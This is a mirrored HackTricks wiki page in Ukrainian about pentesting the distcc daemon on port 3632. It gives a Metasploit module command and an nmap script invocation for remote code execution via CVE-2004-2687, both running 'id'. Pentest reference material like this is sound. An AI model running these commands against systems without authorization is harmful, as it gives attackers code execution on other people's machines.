maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md

31 lines
1.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{{#include ../banners/hacktricks-training.md}}
# Основна інформація
**Distcc** - це інструмент, який покращує **процес компіляції**, використовуючи **вільну обчислювальну потужність** інших комп'ютерів у мережі. Коли **distcc** налаштовано на машині, ця машина здатна розподіляти свої **задачі компіляції** на іншу систему. Ця система-отримувач повинна працювати з **distccd daemon** і мати встановлений **сумісний компілятор** для обробки надісланого коду.
**Порт за замовчуванням:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Експлуатація
Перевірте, чи вразливий до **CVE-2004-2687** для виконання довільного коду:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Я не думаю, що shodan виявляє цей сервіс._
# Resources
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post created by **Álex B (@r1p)**
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink